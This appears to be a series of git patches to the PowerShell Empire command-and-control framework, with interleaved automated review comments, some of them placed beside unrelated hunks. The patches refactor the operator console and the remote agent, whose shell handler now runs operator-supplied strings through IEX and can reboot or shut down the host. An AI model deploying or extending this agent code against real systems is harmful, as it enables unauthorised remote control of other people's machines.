b/lib/common/empire.py 
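Review bot: The new `'(mv|move)'` and `'(copy|cp)'` arms split `$cmdargs` on single spaces, so a destination containing a space cannot be expressed even when quoted (`mv "a b" "c d"` yields a `$dest` of `d"`), and a single-token call such as `mv foo` computes `$parts[0..-1]`, which PowerShell expands to indices 0 and -1, giving a `$source` of `foo foo` and a misleading "cannot find path" exception. Add `if ($parts.length -lt 2) { $output = "[!] usage: $cmd <source> <destination>" }` ahead of the slice, and tokenize with something quote-aware (for instance `[Management.Automation.PSParser]::Tokenize`) if spaces in paths are expected. Invoke-ShellCommand's closing brace lies outside the hunk.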
@@ -1138,8 +1138,8 @@ class AgentMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: '+helpers.color(name, 'red')+') > ' - # shell commands to tab complete - self.shellCmds = ["ls","dir","rm","del","pwd","cat","cd","mkdir","rmdir","mv","arp","netstat","ipconfig","ifconfig","net","route","reboot","restart","shutdown","ps","getpid","whoami", "getuid"] + # agent commands that have opsec-safe alises in the agent code + self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid"] # listen for messages from this specific agent dispatcher.connect( self.handle_agent_event, sender=dispatcher.Any) @@ -1193,14 +1193,17 @@ class AgentMenu(cmd.Cmd): parts = line.split(" ") if len(parts) > 0: - # check if we got a shell command - if parts[0] in self.shellCmds: + # check if we got an agent command + if parts[0] in self.agentCommands: shellcmd = " ".join(parts) # task the agent with this shell command self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", shellcmd) # update the agent log - msg = "Tasked agent to run shell command " + line + msg = "Tasked agent to run command " + line self.mainMenu.agents.save_agent_log(self.sessionID, msg) + else: + print helpers.color("[!] Command not recognized.") + print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") def do_back(self, line): @@ -1213,6 +1216,16 @@ class AgentMenu(cmd.Cmd): raise StopIteration + def do_help(self, *args): + "Displays the help menu or syntax for particular commands." + + if args[0].lower() == "agentcmds": + print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") + print " " + messages.wrap_columns(", ".join(self.agentCommands), " ", width1=50, width2=10, indent=5) + "\n" + else: + cmd.Cmd.do_help(self, *args) + + def do_rename(self, line): "Rename the agent." 
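Review bot: `if parts[0] in self.agentCommands:` is a case-sensitive exact match while the agent's `switch -regex` is case-insensitive, so `Dir C:\` is refused client-side with "Command not recognized" although the agent would run it; `if parts[0].lower() in self.agentCommands:` lines the two up. `shellcmd = " ".join(parts)` recomposes exactly `line`, because `split(" ")` keeps empty fields, so passing `line` directly to `add_agent_task` is the plainer form. The enclosing method starts before this hunk.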
@@ -1387,7 +1400,7 @@ class AgentMenu(cmd.Cmd): if line != "": # task the agent with this shell command - self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", line) + self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "shell " + str(line)) # update the agent log msg = "Tasked agent to run shell command " + line self.mainMenu.agents.save_agent_log(self.sessionID, msg) @@ -1822,14 +1835,6 @@ class AgentMenu(cmd.Cmd): return [s[offs:] for s in ["kill"] if s.startswith(mline)] - def complete_shell(self, text, line, begidx, endidx): - "Tab-complete a shell command" - - mline = line.partition(' ')[2] - offs = len(mline) - len(text) - return [s[offs:] for s in self.shellCmds if s.startswith(mline)] - - def complete_scriptimport(self, text, line, begidx, endidx): "Tab-complete a PowerShell script path" diff --git a/setup/reset.sh b/setup/reset.sh index 3918c4e..9562da9 100755 --- a/setup/reset.sh +++ b/setup/reset.sh @@ -1,5 +1,12 @@ #!/bin/bash +IFS='/' read -a array <<< pwd + +if [[ "$(pwd)" != *setup ]] +then + cd ./setup +fi + # reset the database rm ../data/empire.db ./setup_database.py @@ -11,5 +18,5 @@ rm empire.debug # remove the download folders rm -rf ./downloads/ -# start up Empire in debug mode -./empire --debug +# start up Empire +./empire From 804e1a01a2b013913dabe7ca3ce67c5ed168b38c Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 15:32:26 -0400 Subject: [PATCH 06/11] Revamped basic shell operations in agent core (cp, dir, mv, etc.) Standardized UNC path normalization in agent core added hostname alias --- data/agent/agent.ps1 | 55 ++++++++++++++------------------------------ lib/common/empire.py | 2 +- 2 files changed, 18 insertions(+), 39 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index fdb04aa..5cb1d55 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 
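Review bot: `IFS='/' read -a array <<< pwd` reads the literal word `pwd` (not the command's output) into an array that nothing else uses, and the `cd ./setup` that follows is unchecked, so when the script is launched from a directory that is neither the repository root nor `setup/`, the `cd` fails with only a stderr message, execution continues, and the later `rm ../data/empire.db` and `rm -rf ./downloads/` operate on whatever the current directory happens to be. Delete the dead `read` and anchor on the script's own location instead: `cd "$(dirname "$0")" || exit 1`. A `set -e` at the top would also stop the run at the first failed step rather than carrying on with removals.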
@@ -239,9 +239,12 @@ function Invoke-Empire { function Invoke-ShellCommand { param($cmd, $cmdargs="") - if ($cmdargs.StartsWith("\\")) { - # UNC path normalization for PowerShell - $cmdargs = "FileSystem::$cmdargs" + # UNC path normalization for PowerShell + if ($cmdargs -like "*`"\\*") { + $cmdargs = $cmdargs -replace "`"\\","FileSystem::`"\" + } + elseif ($cmdargs -like "*\\*") { + $cmdargs = $cmdargs -replace "\\\\","FileSystem::\\" } $output = "" @@ -258,46 +261,18 @@ function Invoke-Empire { } else { try{ - $output = Get-ChildItem -force -path "$cmdargs" -ErrorAction Stop | select lastwritetime,length,name + $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name" } catch [System.Management.Automation.ActionPreferenceStopException] { $output = "[!] Error: $_ (or cannot be accessed)." } } } - '(rm|del|rmdir)' { + '(mv|move|copy|cp|rm|del|rmdir)' { if ($cmdargs.length -ne "") { try { - Remove-Item -Force -Recurse "$cmdargs" -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } - } - } - '(mv|move)' { - if ($cmdargs.length -ne "") { - try { - $parts = $cmdargs.split(" ") - $source = $parts[0..$($parts.length-2)] -join " " - $dest = $parts[-1] - Move-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop - $output = "$source moved to $dest" - } - catch { - $output=$_.Exception; - } - } - } - '(copy|cp)' { - if ($cmdargs.length -ne "") { - try { - $parts = $cmdargs.split(" ") - $source = $parts[0..$($parts.length-2)] -join " " - $dest = $parts[-1] - Copy-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop - $output = "$source copied to $dest" + IEX "$cmd $cmdargs -Force -ErrorAction Stop" + $output = "executed $cmd $cmdargs" } catch { $output=$_.Exception; @@ -306,8 +281,9 @@ function Invoke-Empire { } cd { if ($cmdargs.length -ne "") - { - cd $cmdargs + { + $cmdargs = $cmdargs.trim("`"").trim("'") + cd "$cmdargs" $output = pwd } } 
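Review bot: The first normalization branch rewrites `"\\srv\share"` to `FileSystem::"\\srv\share"`, placing the provider prefix outside the opening quote, and the `cd` arm later in this function trims only the outermost quotes, so `cd "\\srv\share"` ends up calling `cd` on `FileSystem::"\\srv\share` with an embedded `"` and fails. Insert the prefix inside the quote instead: `$cmdargs = $cmdargs -replace '"\\\\', '"FileSystem::\\'`. Both branches replace every occurrence, which is what `mv`/`cp` with two UNC arguments need, but a `\\` embedded mid-path would be rewritten too; anchoring on start-of-string or whitespace, `'(^|\s)\\\\'` with `'$1FileSystem::\\'`, limits the rewrite to path starts. The rest of Invoke-ShellCommand falls outside this hunk.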
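Review bot: Folding `rm|del|rmdir` into the `IEX "$cmd $cmdargs -Force -ErrorAction Stop"` arm drops the `-Recurse` that the previous arm passed, so `Remove-Item` on a non-empty directory now asks for confirmation; under a host started with `-NonInteractive` that surfaces as a prompt-failure exception in the catch, and under an interactive host it blocks the agent's command loop. Give the delete aliases their own arm whose expression adds the flag, `IEX "$cmd $cmdargs -Force -Recurse -ErrorAction Stop"`, and leave `mv`/`move`/`copy`/`cp` as they are, since Move-Item does not accept `-Recurse`. Note also that the `'(ls|dir)'` arm now interpolates the operator's `$cmd` token into the IEX string, so whatever the unanchored regex lets through is executed as-is rather than being mapped to `Get-ChildItem`.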
@@ -383,7 +359,10 @@ function Invoke-Empire { } else { $output = route $cmdargs } } - '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(whoami|getuid)' { $output = [Security.Principal.WindowsIdentity]::GetCurrent().Name } + hostname { + $output = [System.Net.Dns]::GetHostByName(($env:computerName)) + } '(reboot|restart)' { Restart-Computer -force } shutdown { Stop-Computer -force } default { diff --git a/lib/common/empire.py b/lib/common/empire.py index 24ae92b..3c5e60a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -1139,7 +1139,7 @@ class AgentMenu(cmd.Cmd): self.prompt = '(Empire: '+helpers.color(name, 'red')+') > ' # agent commands that have opsec-safe alises in the agent code - self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid"] + self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid","hostname"] # listen for messages from this specific agent dispatcher.connect( self.handle_agent_event, sender=dispatcher.Any) From 0e0c94b94aa8194134d68cdff1b1f3a749c7d929 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 18:49:23 -0400 Subject: [PATCH 07/11] Aliased run for execute. --- lib/common/empire.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 3c5e60a..307cefc 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2397,6 +2397,11 @@ class ModuleMenu(cmd.Cmd): self.mainMenu.agents.save_agent_log(agentName, msg) + def do_run(self, line): + "Execute the given Empire module." + self.do_execute(line) + + def complete_set(self, text, line, begidx, endidx): "Tab-complete a module option to set." 
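Review bot: The new `hostname` arm assigns `[System.Net.Dns]::GetHostByName(($env:computerName))`, which returns an `IPHostEntry` object (HostName, Aliases, AddressList) rather than a name, so `$output` becomes a formatted object dump instead of the string the alias implies; `GetHostByName` is also marked obsolete in .NET in favour of `GetHostEntry`, and the doubled parentheses are redundant. `$output = [System.Net.Dns]::GetHostEntry($env:computerName).HostName` yields the resolved name, or `$output = $env:COMPUTERNAME` if the local NetBIOS name is all that is wanted and no lookup should be made. The enclosing switch continues outside the hunk.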
From 5b40197fd572e928b4624012f8318fa8d93c9971 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 19:08:40 -0400 Subject: [PATCH 08/11] 'list [agents/listeners] ' should now be a universal option in every menu Added 'run' alias for 'execute' in listener menu as well. --- lib/common/empire.py | 153 ++++++++++++++++++++++++++++++------------- 1 file changed, 109 insertions(+), 44 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 307cefc..e6c3c25 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py 
@@ -501,6 +501,63 @@ class MainMenu(cmd.Cmd): self.modules.reload_module(line) + def do_list(self, line): + "Lists active agents or listeners." + + parts = line.split(" ") + + if parts[0].lower() == "agents": + + line = " ".join(parts[1:]) + agents = self.agents.get_agents() + + if line.strip().lower() == "stale": + + displayAgents = [] + + for agent in agents: + + sessionID = self.agents.get_agent_id(agent[3]) + + # max check in -> delay + delay*jitter + intervalMax = (agent[4] + agent[4] * agent[5])+30 + + # get the agent last check in time + agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) + if agentTime < time.mktime(time.localtime()) - intervalMax: + # if the last checkin time exceeds the limit, remove it + displayAgents.append(agent) + + messages.display_staleagents(displayAgents) + + + elif line.strip() != "": + # if we're listing an agents active in the last X minutes + try: + minutes = int(line.strip()) + + # grab just the agents active within the specified window (in minutes) + displayAgents = [] + for agent in agents: + agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) + + if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60): + displayAgents.append(agent) + + messages.display_agents(displayAgents) + + except: + print helpers.color("[!] Please enter the minute window for agent checkin.") + + else: + messages.display_agents(agents) + + + elif parts[0].lower() == "listeners": + + messages.display_listeners(self.listeners.get_listeners()) + + def complete_usemodule(self, text, line, begidx, endidx): "Tab-complete an Empire PowerShell module path." 
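Review bot: `MainMenu.do_list` gives no feedback when the first word is neither `agents` nor `listeners` (including an empty line), so `list` and `list foo` silently print nothing; an `else:` with `print helpers.color("[!] Please use 'list [agents/listeners] '.")` would match what the sub-menu `do_list` methods later in this patch print. The bare `except:` around `int(line.strip())` also reports any failure inside `messages.display_agents` as a bad minute value; `except ValueError:` narrows it to the parse it is meant to guard. `sessionID = self.agents.get_agent_id(agent[3])` in the stale loop is assigned but never read and can be dropped, and the docstring could state the accepted forms, e.g. `"Lists active agents or listeners: list agents [stale|MINUTES] | list listeners"`.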
@@ -624,50 +681,14 @@ class AgentsMenu(cmd.Cmd): def do_list(self, line): - "Lists all active agents." - - agents = self.mainMenu.agents.get_agents() - - if line.strip().lower() == "stale": - - displayAgents = [] - - for agent in agents: - - sessionID = self.mainMenu.agents.get_agent_id(agent[3]) - - # max check in -> delay + delay*jitter - intervalMax = (agent[4] + agent[4] * agent[5])+30 - - # get the agent last check in time - agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) - if agentTime < time.mktime(time.localtime()) - intervalMax: - # if the last checkin time exceeds the limit, remove it - displayAgents.append(agent) - - messages.display_staleagents(displayAgents) - - - elif line.strip() != "": - # if we're listing an agents active in the last X minutes - try: - minutes = int(line.strip()) - - # grab just the agents active within the specified window (in minutes) - displayAgents = [] - for agent in agents: - agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) - - if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60): - displayAgents.append(agent) - - messages.display_agents(displayAgents) - - except: - print helpers.color("[!] Please enter the minute window for agent checkin.") + "Lists all active agents (or listeners)." + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) else: - messages.display_agents(agents) + self.mainMenu.do_list("agents " + str(line)) def do_rename(self, line): 
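Review bot: `str(" ".join(line.split(" ")[1:]))` wraps a value that is already a `str` and splits on a single space, so it reads as more machinery than it is; `self.mainMenu.do_list("listeners " + line.partition(' ')[2])` expresses the same hand-off in one call. `line.lower().startswith("listeners")` is a prefix test, so `listenersfoo` is routed as `listeners`; comparing the first word (`line.split(None, 1)[0].lower() == "listeners"`) is stricter. The identical three-branch block is repeated in the `do_list` methods added to AgentMenu, ListenerMenu, ModuleMenu and StagerMenu on the following lines of this patch, so one forwarding helper on `MainMenu` taking the default target would leave a single copy to maintain.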
@@ -1226,6 +1247,17 @@ class AgentMenu(cmd.Cmd): cmd.Cmd.do_help(self, *args) + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_rename(self, line): "Rename the agent." @@ -1911,8 +1943,14 @@ class ListenerMenu(cmd.Cmd): def do_list(self, line): - "List all active listeners." - messages.display_listeners(self.mainMenu.listeners.get_listeners()) + "List all active listeners (or agents)." + + if line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + else: + self.mainMenu.do_list("listeners " + str(line)) def do_back(self, line): @@ -1995,6 +2033,11 @@ class ListenerMenu(cmd.Cmd): self.mainMenu.listeners.add_listener_from_config() + def do_run(self, line): + "Execute a listener with the currently specified options." + self.do_execute(line) + + def do_agents(self, line): "Jump to the Agents menu." a = AgentsMenu(self.mainMenu) @@ -2225,6 +2268,17 @@ class ModuleMenu(cmd.Cmd): return True + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_reload(self, line): "Reload the current module." 
@@ -2525,6 +2579,17 @@ class StagerMenu(cmd.Cmd): return True + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_info(self, line): "Display stager options." messages.display_stager(self.stagerName, self.stager) From b434102f2c2275eaf2e56825014d8b0be3d3190c Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Fri, 21 Aug 2015 14:17:55 -0400 Subject: [PATCH 09/11] Error handling for issue #23 --- lib/common/helpers.py | 27 ++++++++++++++++----------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/common/helpers.py b/lib/common/helpers.py index 483684b..e9b5654 100644 --- a/lib/common/helpers.py +++ b/lib/common/helpers.py @@ -361,17 +361,22 @@ def lhost(): )[20:24]) except IOError as e: return "" - ip = socket.gethostbyname(socket.gethostname()) - if ip.startswith("127.") and os.name != "nt": - interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] - for ifname in interfaces: - try: - ip = get_interface_ip(ifname) - if ip != "": - break - except: - print "Unexpected error:", sys.exc_info()[0] - pass + try: + ip = socket.gethostbyname(socket.gethostname()) + if ip.startswith("127.") and os.name != "nt": + interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] + for ifname in interfaces: + try: + ip = get_interface_ip(ifname) + if ip != "": + break + except: + print "Unexpected error:", sys.exc_info()[0] + pass + except: + print "Unexpected error:", sys.exc_info()[0] + pass + return ip From 54c7300998f13730f17ba3d270ee45bd9c28fa9e Mon Sep 17 00:00:00 2001 
From: Harmj0y Date: Fri, 21 Aug 2015 15:24:12 -0400 Subject: [PATCH 10/11] Tweaks to fix for issue #23 --- lib/common/helpers.py | 26 +++++++++++++++----------- 1 file changed, 15 insertions(+), 11 deletions(-) diff --git a/lib/common/helpers.py b/lib/common/helpers.py index e9b5654..6d297b0 100644 --- a/lib/common/helpers.py +++ b/lib/common/helpers.py @@ -361,22 +361,26 @@ def lhost(): )[20:24]) except IOError as e: return "" + + ip = "" try: ip = socket.gethostbyname(socket.gethostname()) - if ip.startswith("127.") and os.name != "nt": - interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] - for ifname in interfaces: - try: - ip = get_interface_ip(ifname) - if ip != "": - break - except: - print "Unexpected error:", sys.exc_info()[0] - pass + except socket.gaierror: + pass except: print "Unexpected error:", sys.exc_info()[0] - pass + return ip + if (ip == "" or ip.startswith("127.")) and os.name != "nt": + interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] + for ifname in interfaces: + try: + ip = get_interface_ip(ifname) + if ip != "": + break + except: + print "Unexpected error:", sys.exc_info()[0] + pass return ip From 4e9e0d0cb45db09106e7215140710cd07ab4d356 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Sun, 23 Aug 2015 17:18:13 -0400 Subject: [PATCH 11/11] Updated changelog. --- changelog | 2 ++ 1 file changed, 2 insertions(+) diff --git a/changelog b/changelog index b9ca12b..2fc51d2 100644 --- a/changelog +++ b/changelog @@ -3,6 +3,8 @@ -Continued porting native shell commands to WMI replacents in agent core -In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases -Modified ./setup/reset.sh to work from parent or ./setup/ folders +-Agent core functions streamlined +-"list [agents/listeners] " should now be a global command 8/19/2015 ---------
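Review bot: The outer `except:` that follows `except socket.gaierror:` in `lhost` is a bare except, so it also catches `KeyboardInterrupt` and `SystemExit` and turns them into a `return ip`; `except Exception:` keeps the intended fallback without swallowing interpreter signals, and the same bare `except:` (followed by a redundant `pass` after the `print`) sits in the per-interface loop here and in patch 09's earlier version of this hunk. The new `ip = ""` initialisation plus `except socket.gaierror: pass` means an unresolvable hostname now falls through to the interface scan on non-Windows hosts, which is the stated fix; on Windows it returns `""`, which callers presumably handle. `lhost` begins before the hunk — the first context lines are the tail of its nested `get_interface_ip` helper.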